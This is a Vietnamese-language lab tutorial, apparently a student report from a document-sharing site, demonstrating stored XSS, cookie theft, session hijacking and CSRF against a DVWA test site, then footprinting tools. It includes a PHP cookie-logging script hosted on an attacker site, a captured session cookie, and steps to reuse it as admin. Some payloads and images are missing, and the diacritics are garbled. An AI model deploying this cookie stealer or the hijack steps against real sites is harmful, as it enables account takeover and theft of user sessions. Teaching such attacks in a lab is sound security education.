Tải bản đầy đủ - 0 (trang)
2 KỸ THUẬT TẤN CÔNG XSS (CROSS-SITE SCRIPTING)

2 KỸ THUẬT TẤN CÔNG XSS (CROSS-SITE SCRIPTING)

Tải bản đầy đủ - 0trang

Giao diện sau khi đăng nhập:



Bước 2: Ta truy cập vào mục XSS (Stored), nhập thử đoạn mã sau để kiểm tra:

Trường ĐH CNTT





Kết quả sau khi nhập đoạn mã trên:



Ta thấy các đoạn mã đã được thực thi và chúng được lưu trữ trong database của trang

web. Riêng đoạn mã khơng hiển thị ra ngồi chứng tỏ web

có khả năng bị lỗi XSS Stored, cho phép lưu trữ các đoạn mã thuộc dạng script.

Dựa vào đây thay vì chèn các đoạn mã vơ hại thì các hacker có thể chèn các mã độc

chạy bằng script để lấy thông tin người dùng, bất cứ người dùng nào khi truy cập vào trang

web này thì mã độc sẽ được thực thi.

Bước 3: Ta sẽ tạo một trang web để ăn cắp cookie người dùng.

Web có địa chỉ: http://attack.16mb.com/

Trên trang web này ta tạo 1 file php (cc.php) để lấy cookie người dùng và 1 file log

(log.txt) để lưu cookie.

Nội dung của file cc.php:


function logData()

{

$ipLog="log.txt";

$cookie = $_SERVER['QUERY_STRING'];

$log=fopen("$ipLog", "a+");

fputs($log, "COOKIE: $cookie \n\n");

fclose($log);

}

logData();

?>

Bước 4: Ta quay lại mục XSS Stored của DVWA chèn đoạn script:





Kết quả sau khi chèn:



Đoạn script được lưu trên database



Sau đó chỉ việc chờ user khác đăng nhập vào là ta sẽ lấy được cookie.



Bước 5: Thử đăng nhập 1 nick khác vào trang web để kiểm tra.

Username: admin

Password: password



Kết quả sau khi đăng nhập vào và truy cập mục XSS Stored



Ta thấy cookie người dùng đã bị đánh cắp. Kiểm tra lại file log



Cookie thu được:

COOKIE:

cookie=PHPSESSID=55114c5bcbfd6e8153bc3d860eddb243;%20security=low

Bây giờ ta có thể dựa vào cookie đó để đăng nhập vào user admin mà khơng cần biết

password.

Bước 6: Mở trình duyệt firefox, cài tiện ích Cookies Manager +. Sau đó truy cập vào

trang login http://victim.16mb.com/login.php và bật Cookies Manager +

Tick vào mục victim.16mb.com PHPSESSID chọn Edit



Chép đoạn mã cookie vừa đánh cắp được vào mục Content sau đó chọn Save để lưu. Giờ

ta quay lại trang đăng nhập reload lại trang web là có thể truy cập vào bằng user admin.



3.3 3.3 THAO TÁC TRÊN CÁC THAM SỐ TRUYỀN

Bước 1: Chuẩn bị một trang web bị lỗi CSRF. Trong bài này sử dụng mã web mã nguồn

mở DVWA.

http://victim.16mb.com/login.php

Tài khoản đăng nhập:

Username: Pablo

Password: letmein

Bước 2:

Sau khi đăng nhập, chọn CSRF

Bước 3:

Thay đổi mật khẩu admin

“letmein” thành “abc123”



Bước 3:

Thay đổi trong đường dẫn: abc123 thành nhan123, sau đó enter



Bước 4: thử đăng nhập với password mới là nhan123, đăng nhập thành công



CHƯƠNG 4: TỔNG KẾT Q TRÌNH TẤN CƠNG CỦA HACKER

4.1 THU THẬP THÔNG TIN Ở MỨC CƠ SỞ HẠ TẦNG

4.1.1 FootPrinting (in dấu chân)

Thu thập thông tin về cơ sở hạ tầng máy chủ WEB là bước đầu tiên trong tấn công ứng

dụng WEB, đây là cách mà Hacker làm khi muốn lấy một lượng thông tin tối đa về máy chủ



WEB cũng như công ty hay người quản trị bao gồm về địa chỉ IP, DNS, hệ điều hành gì,... là

những thông tin cần thiết liên quan đến mục tiêu của cuộc tấn công.

Tra cứu trực tuyến với các thông tin liên quan máy chủ WEB như IP, hiện records

DNS đăng kí tại máy chủ DNS nào, thơng tin về người quản trị viên đứng tên miền.

Cơng cụ:

















http://www.whois.net

http://www.iptools.com

http://netcraft.com

http://www.tamos.com

Ví dụ: Thơng tin tên miền 2mit.net với whois.net



Hình 4.1: Giao diện trang whois.net.



Tài liệu bạn tìm kiếm đã sẵn sàng tải về

2 KỸ THUẬT TẤN CÔNG XSS (CROSS-SITE SCRIPTING)

Tải bản đầy đủ ngay(0 tr)

×